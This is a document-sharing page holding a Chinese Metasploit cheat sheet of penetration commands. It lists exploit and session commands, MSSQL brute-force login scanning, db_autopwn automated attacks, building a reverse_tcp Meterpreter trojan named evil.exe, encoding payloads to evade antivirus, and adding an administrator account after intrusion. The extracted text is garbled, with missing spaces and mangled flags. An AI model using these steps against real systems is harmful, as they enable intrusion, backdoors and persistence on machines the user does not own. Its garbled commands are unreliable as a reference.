metasploit常用渗透命令[文].pdfVIP

  • 0
  • 0
  • 约3.35千字
  • 约 3页
  • 2021-10-19 发布于福建
  • 举报
metasploit 常用渗透命令 svnupdate升级 ./msfwebWeb 接口 :55555 。. ./msfconsole 字符下的 Console。 help帮助 showoption 显示选项 searchname搜索名字 useexploitname使用漏洞 showoptions 显示选项 setOPTIONNAMEoption 设置选项 showpayloads显示装置 setPAYLOADpayloadname设置装置 showoptions 显示选项 setOPTIONNAMEoption 设置选项 showtargets显示目标 (os 版本 ) setTARGETtargetnumber 设置目标版本 exploit 开始漏洞攻击 sessions--l列出会话‐ sessions--iID‐ 选择会话 sessions--k‐ID结束会话 ctrlz把会话放到后台 ctrlc结束会话 jobs 列出漏洞运行工作 jobs--K‐结束一个漏洞运行工作 showauxiliary 显示辅助模块 useauxiliaryname使用辅助模块 setOPTIONNAMEoption 设置选项 run 运行模块 scanner/smb/version 扫描系统版本 scanner/mssql/mssql_ping 测试 mssql 是否在线 scanner/mssql/mssql_login 测试登录 (暴力或字典 ) Attackerbehindf irewall:bindshell 正向 Targetbehindf irewall:reverseshell 反向 Meterpreter 衔接不懂 dos 的可以用这个 : db_import_nessus_nbe加载 nessus 的扫描结果 db_import_nmap_xml 加载 nmap 的扫描结果 自动化攻击流程 : cd/ pentest/exploit/framework3 ./msfconsole loaddb_sqlite3 db_destroypentest db_createpentest db_nmaptargetIP db_hosts db_services db_autopwn--t--p‐--e‐ ‐ 字符接口攻击流程 : ./msfcli|grep--iname‐ ./msfcliexploitorauxiliaryS ./msfcliexploitnameOPTIONNAME=option PAYLOAD=payloadname E 做木马后门等 : ./msfpayloadpayloadvariable=valueoutputtype Ssummaryandoptionsofpayload CClanguage PPerl yRuby RRaw,allowspayloadt obepipedintomsfencodeandothert ools JJavaScript XW indowsexecutable ./msfpayloadw indows/shell/reverse_tcp LHOST=C ./msfpayload windows/meterpreter/reverse_tcp LHOST=LPORT=4444 Xevil.exe 编码处理就是做免杀 : ./msfencodeoptionsvariable=value ./msfpayloadlinux_ia32_bindLPORT=4444R|./msfencode--b‐‘x00 ′-- ‐l ./msfpayload linux_ia32_bind LPORT=4444R| ./msfencode -- ‐‘bx00 ′ -- ‐e PexFnstenvMor--tc‐ 入侵后在 windows 下添加管理员用户 : hostname 查看主机名 netusers查看用户 netuser用户密码 /add 添加用户 netlocalgroup 查看工作组 netlocalgroupadministrators 查看管理员组 netlocalgroupadministrators

文档评论(0)

1亿VIP精品文档

相关文档